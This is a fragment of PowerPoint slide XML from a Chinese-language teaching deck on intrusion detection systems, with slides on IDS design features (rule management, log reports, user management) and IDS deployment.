              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{990B7D58-F9EF-2696-553B-51D8A7A6C8E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1779384" y="3507672"/>
            <a:ext cx="1455738" cy="800101"/>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70" name="Freeform 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{769AEDCD-21E3-11F2-4463-4F952FB00967}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1921560" y="3530208"/>
            <a:ext cx="773112" cy="3698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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="Text Box 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{534CC0B1-FA45-07D7-A096-A333020060D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="1750111" y="3641145"/>
            <a:ext cx="1533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latinLnBrk="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>规则管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="72" name="AutoShape 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{055A95A8-3AB9-0493-034A-ABEB227CAE41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="3035985" y="4517649"/>
            <a:ext cx="7709414" cy="795338"/>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ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="74" name="TextBox 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5453C0C0-B6E9-4C4D-740A-2173434ACA15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3437975" y="4508122"/>
            <a:ext cx="69210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Blip>
                <a:blip r:embed="rId4"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>至少需要提供多种文本和图形的报表模板，且报表格式可以导出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>WORD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>TXT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>EXCEL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>PDF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>等常用的格式。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="AutoShape 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B0EE136-FB2D-6DFE-F314-AD287B32BAEF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="2953435" y="5501586"/>
            <a:ext cx="7791964" cy="765235"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 11505"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="bg1">
                  <a:lumMod val="75000"/>
                  <a:alpha val="79000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="folHlink">
                  <a:gamma/>
                  <a:shade val="46275"/>
                  <a:invGamma/>
                  <a:alpha val="0"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="0" scaled="1"/>
          </a:gradFill>
          <a:ln w="19050" algn="ctr">
            <a:solidFill>
              <a:schemeClr val="accent6">
                <a:lumMod val="50000"/>
              </a:schemeClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="77" name="TextBox 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{011D3FB1-2D32-8007-792B-9C3646BACE88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3401110" y="5539686"/>
            <a:ext cx="73442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indent="-342900" latinLnBrk="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buBlip>
                <a:blip r:embed="rId4"/>
              </a:buBlip>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>对用户权限进行严格的定义，提供口令修改、添加用户、删除用户、用户权限配置等功能，有效保护系统使用的安全性。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="78" name="AutoShape 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00C2C115-A81E-DE3B-9226-28FC55B009D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1818372" y="5501586"/>
            <a:ext cx="1455738" cy="765235"/>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79" name="Freeform 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9684D2A7-59E1-7F49-9985-5E86645339B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1935847" y="5566673"/>
            <a:ext cx="833438" cy="39370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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="80" name="Text Box 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6832C59-FBD4-B07F-E6A6-A7A1AA85EC7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="1804862" y="5726384"/>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latinLnBrk="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>用户管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="AutoShape 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2BD7C48-B9D3-0CC6-19E6-F1116828C79B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1786622" y="4514472"/>
            <a:ext cx="1455738" cy="798515"/>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headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw dist="53882" dir="2700000" algn="ctr" rotWithShape="0">
              <a:srgbClr val="000000">
                <a:alpha val="50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82" name="Freeform 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{801E4974-7BF5-76E7-4671-F6ABD264E8B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="gray">
          <a:xfrm>
            <a:off x="1905686" y="4579560"/>
            <a:ext cx="847725" cy="40481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pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="83" name="Text Box 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{049C2536-91F1-936B-3835-E5C09272242A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="white">
          <a:xfrm>
            <a:off x="1794560" y="4755990"/>
            <a:ext cx="1492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3"/>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latinLnBrk="0">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>日志报表</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59E05021-328B-438B-AB27-11F29782FF35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4.1 IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的设计</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1983755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4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4141010-D781-1B52-2588-16D7A219E4CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3401480610"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2247913" y="1461392"/>
          <a:ext cx="7696173" cy="4996126"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s4139" name="Visio" r:id="rId4" imgW="12826955" imgH="8326877" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId4" imgW="12826955" imgH="8326877" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="19" name="Object 4">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4141010-D781-1B52-2588-16D7A219E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13" y="1461392"/>
                        <a:ext cx="7696173" cy="499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 name="组合 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D521ECB-B36D-9618-3E34-06D0DF16C286}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1080000" y="1260000"/>
            <a:ext cx="3171687" cy="720000"/>
            <a:chOff x="3792538" y="3138472"/>
            <a:chExt cx="1239837" cy="734063"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="AutoShape 15">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49BDF685-836D-E1DC-6A97-8557BD088940}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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22" name="Freeform 16">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E250624-72B3-B8FE-6A79-0D9BD5328989}"/>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23" name="Text Box 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAC22EA7-6E81-E154-D88A-6CC136F4D3ED}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3860800" y="3293024"/>
              <a:ext cx="1109663" cy="46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3399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>典型的</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>IDS</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>的部署</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B101F0A-B761-4604-8F37-DC3D746164C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>4.2 IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的部署</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3429498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7FE56C7-A938-4AC0-8C8B-98AE9D55AB45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2700000" y="1620000"/>
            <a:ext cx="5923434" cy="660250"/>
            <a:chOff x="1672156" y="1953172"/>
            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="组合 3">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46DE48FB-93CB-4A83-80C4-819A2E19507D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="矩形: 圆角 5">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{075E11FA-47AF-410A-B62E-11BF604B473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7C1ACD8E-1DB0-407F-8ED0-530CC024A020}"/>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01</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0245B580-05B9-4A4A-A880-F45BF4A3B95D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2517106" y="2037878"/>
              <a:ext cx="4134772" cy="447729"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t> 入侵检测系统概述</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="组合 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F393E855-347F-47DC-BF7C-D072346A7DF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3600000" y="2520000"/>
            <a:ext cx="5923434" cy="660250"/>
            <a:chOff x="1672156" y="1953172"/>
            <a:chExt cx="5184161" cy="600299"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="9" name="组合 8">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FBE5B2F-A33E-455C-94DC-0DD74C8598CE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1672156" y="1953172"/>
              <a:ext cx="5184161" cy="600299"/>
              <a:chOff x="1442977" y="2200774"/>
              <a:chExt cx="5184161" cy="600299"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="矩形: 圆角 10">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
